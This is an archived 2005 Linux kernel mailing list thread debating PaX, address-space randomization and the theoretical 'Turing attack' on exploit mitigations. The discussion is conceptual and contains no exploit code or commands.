* Re: the "Turing Attack" (was: Sabotaged PaXtest) 2005-02-08 16:48 ` the "Turing Attack" (was: Sabotaged PaXtest) Ingo Molnar 2005-02-08 22:08 ` Ingo Molnar @ 2005-02-08 22:41 ` H. Peter Anvin 1 sibling, 0 replies; 26+ messages in thread From: H. Peter Anvin @ 2005-02-08 22:41 UTC (permalink / raw) To: linux-kernel Followup to: <20050208164815.GA9903@elte.hu> By author: Ingo Molnar <mingo@elte.hu> In newsgroup: linux.dev.kernel > > This, on the face of it, seems like a ridiculous possibility as the > chances of that are reverse proportional to the number of bits necessary > to implement the simplest Turing Machine. (which for anything even > closely usable are on the order of 2^10000, less likely than the > likelyhood of us all living to the end of the Universe.) > 2^10000? Not even close. You can build a fully Turing-complete interpreter in a few tens of bytes (a few hundred bits) on most architectures, and you have to consider ALL bit combinations that can form an accidental Turing machine. What is far less clear is whether or not you can use that accidental Turing machine to do real damage. After all, it's not computation (in the strict sense) that causes security violations, it's I/O. Thus, the severity of the problem depends on which I/O primitives the accidental Turing machine happens to embody. Note that writing to the memory of the host process is considered I/O for this purpose. -hpa ^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer) 2005-02-02 22:08 ` pageexec 2005-02-03 9:44 ` Ingo Molnar @ 2005-02-03 13:55 ` Peter Busser 2005-02-03 14:39 ` Roman Zippel 1 sibling, 1 reply; 26+ messages in thread From: Peter Busser @ 2005-02-03 13:55 UTC (permalink / raw) To: pageexec; +Cc: linux-kernel On Wednesday 02 February 2005 23:08, pageexec@freemail.hu wrote: > > and how do you force a program to call that function and then to execute > > your shellcode? In other words: i challenge you to show a working > > (simulated) exploit on Fedora (on the latest fc4 devel version, etc.) > > that does that. Ingo is assuming a best-case scenario here. Assumptions are the mother of all fuckups. This discussion does not address issues which arise when: - You compile code with different compilers (say, OCaml, tcc, Intel Compiler, or whatever) - What happens when you run existing commercial applications which have not been compiled using GCC. - What happens when you mix GCC compiled code with other code (e.g. a commercial Motif library). - What happens when you link libraries compiled with older GCC versions? - And so on and so forth. It can be fun to dive into a low-level details discussion. But unless you solved the higher level issues, the whole discussion is just a waste of time. And these higher level issues won't be fixed unless people start to properly address worst-case behaviour, like any sensible engineer would do. > i don't have any Fedora but i think i know roughly what you're doing, > if some of the stuff below wouldn't work, let me know. You've tried to educate these people before. You're wasting your time and talent. I think you should ask for a handsome payment when these people want to enjoy the privilege of being properly educated by someone who knows what he's talking about. Groetjes, Peter. ^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer) 2005-02-03 13:55 ` Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer) Peter Busser @ 2005-02-03 14:39 ` Roman Zippel 2005-02-07 12:23 ` pageexec 2005-02-07 18:31 ` John Richard Moser 0 siblings, 2 replies; 26+ messages in thread From: Roman Zippel @ 2005-02-03 14:39 UTC (permalink / raw) To: Peter Busser; +Cc: pageexec, linux-kernel Hi, On Thu, 3 Feb 2005, Peter Busser wrote: > - What happens when you run existing commercial applications which have not > been compiled using GCC. >From http://pax.grsecurity.net/docs/pax.txt: The goal of the PaX project is to research various defense mechanisms against the exploitation of software bugs that give an attacker arbitrary read/write access to the attacked task's address space. Could you please explain how PaX makes such applications secure? bye, Roman ^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer) 2005-02-03 14:39 ` Roman Zippel @ 2005-02-07 12:23 ` pageexec 2005-02-07 18:31 ` John Richard Moser 1 sibling, 0 replies; 26+ messages in thread From: pageexec @ 2005-02-07 12:23 UTC (permalink / raw) To: Peter Busser, Roman Zippel; +Cc: linux-kernel > From http://pax.grsecurity.net/docs/pax.txt: > > The goal of the PaX project is to research various defense mechanisms > against the exploitation of software bugs that give an attacker arbitrary > read/write access to the attacked task's address space. > > Could you please explain how PaX makes such applications secure? the answer should be in the doc you linked... if you have specific questions, feel free to ask. ^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer) 2005-02-03 14:39 ` Roman Zippel 2005-02-07 12:23 ` pageexec @ 2005-02-07 18:31 ` John Richard Moser 1 sibling, 0 replies; 26+ messages in thread From: John Richard Moser @ 2005-02-07 18:31 UTC (permalink / raw) To: Roman Zippel; +Cc: Peter Busser, pageexec, linux-kernel -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Roman Zippel wrote: > Hi, > > On Thu, 3 Feb 2005, Peter Busser wrote: > > >>- What happens when you run existing commercial applications which have not >>been compiled using GCC. > > >>From http://pax.grsecurity.net/docs/pax.txt: > > The goal of the PaX project is to research various defense mechanisms > against the exploitation of software bugs that give an attacker arbitrary > read/write access to the attacked task's address space. > > Could you please explain how PaX makes such applications secure? > I wrote an easy-to-chew article[1] about PaX on Wikipedia, although looking back at it I think there may be some erratta in the ASLR concept; I think the mmap() base is randomized, but I'm not sure now if the actual base of each mmap() call is individually randomized as shown in my diagrams. I'm also no longer sure where I got the notion that the heap/.bss/data segments are the same entity, and I'll have to check on that. Nevertheless, it's basically accurate, in the same way that saying you have a gameboy advance SP when you just have a gameboy advance is basically accurate. [1] http://en.wikipedia.org/wiki/PaX > bye, Roman > - > To unsubscribe from this list: send the line "unsubscribe linux-kernel" in > the body of a message to majordomo@vger.kernel.org > More majordomo info at http://vger.kernel.org/majordomo-info.html > Please read the FAQ at http://www.tux.org/lkml/ > - -- All content of all messages exchanged herein are left in the Public Domain, unless otherwise explicitly stated. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.5 (GNU/Linux) Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org iD8DBQFCB7PlhDd4aOud5P8RAr+pAKCCcbqLuG7OQzZlJrd5UdsA3NooUgCePXnp D+xS98fWm9MVEBZpB+pIrTY= =r+20 -----END PGP SIGNATURE----- ^ permalink raw reply [flat|nested] 26+ messages in thread
end of thread, other threads:[~2005-02-11 8:52 UTC | newest] Thread overview: 26+ messages (download: mbox.gz follow: Atom feed -- links below jump to the message on this page -- 2005-02-02 16:51 Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer) Ingo Molnar 2005-02-02 22:08 ` pageexec 2005-02-03 9:44 ` Ingo Molnar 2005-02-03 14:20 ` pageexec 2005-02-03 20:20 ` Ingo Molnar 2005-02-07 14:23 ` pageexec 2005-02-07 21:08 ` Ingo Molnar 2005-02-08 12:27 ` pageexec 2005-02-08 21:23 ` Ingo Molnar 2005-02-07 22:36 ` Ingo Molnar 2005-02-08 12:27 ` pageexec 2005-02-08 13:41 ` Ingo Molnar 2005-02-08 14:25 ` Julien TINNES 2005-02-08 16:56 ` Ingo Molnar 2005-02-08 16:48 ` the "Turing Attack" (was: Sabotaged PaXtest) Ingo Molnar 2005-02-08 22:08 ` Ingo Molnar 2005-02-10 13:43 ` Ingo Molnar 2005-02-10 13:58 ` Jakob Oestergaard 2005-02-10 15:21 ` Ingo Molnar 2005-02-10 20:03 ` David Weinehall 2005-02-11 8:51 ` Mika Bostrom 2005-02-08 22:41 ` H. Peter Anvin 2005-02-03 13:55 ` Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer) Peter Busser 2005-02-03 14:39 ` Roman Zippel 2005-02-07 12:23 ` pageexec 2005-02-07 18:31 ` John Richard Moser
This is a public inbox, see mirroring instructions for how to clone and mirror all data and code used for this inbox